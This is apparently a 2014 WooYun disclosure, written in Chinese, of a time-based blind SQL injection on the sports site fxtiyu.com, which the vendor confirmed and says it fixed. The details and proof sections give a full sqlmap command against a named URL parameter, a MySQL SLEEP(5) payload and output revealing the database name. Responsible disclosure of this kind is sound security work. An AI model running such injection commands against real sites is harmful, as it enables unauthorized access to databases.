漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-064490
漏洞标题:飞翔体育存在SQL注入
相关厂商:chinaiiss.com
漏洞作者: Lonely
提交时间:2014-06-11 15:36
修复时间:2014-07-26 15:38
公开时间:2014-07-26 15:38
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-11: 细节已通知厂商并且等待厂商处理中
2014-06-11: 厂商已经确认,细节仅向厂商公开
2014-06-21: 细节向核心白帽子及相关领域专家公开
2014-07-01: 细节向普通白帽子公开
2014-07-11: 细节向实习白帽子公开
2014-07-26: 细节向公众公开
简要描述:
注入
详细说明:
sqlmap.py -u "http://www.fxtiyu.com/do.php?inajax=1&do=spec&ac=article_count¶meter=1"
[13:50:01] [INFO] resuming back-end DBMS 'mysql'
[13:50:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: parameter
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: inajax=1&do=spec&ac=article_count¶meter=1 AND SLEEP(5)
---
[13:50:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[13:50:01] [INFO] fetching current database
[13:50:01] [INFO] resumed: fxtiyu
current database: 'fxtiyu'
漏洞证明:
[13:50:01] [INFO] resuming back-end DBMS 'mysql'
[13:50:01] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: parameter
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: inajax=1&do=spec&ac=article_count¶meter=1 AND SLEEP(5)
---
[13:50:01] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[13:50:01] [INFO] fetching current database
[13:50:01] [INFO] resumed: fxtiyu
current database: 'fxtiyu'
修复方案:
版权声明:转载请注明来源 Lonely@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-06-11 16:03
厂商回复:
已修复,感谢。
最新状态:
暂无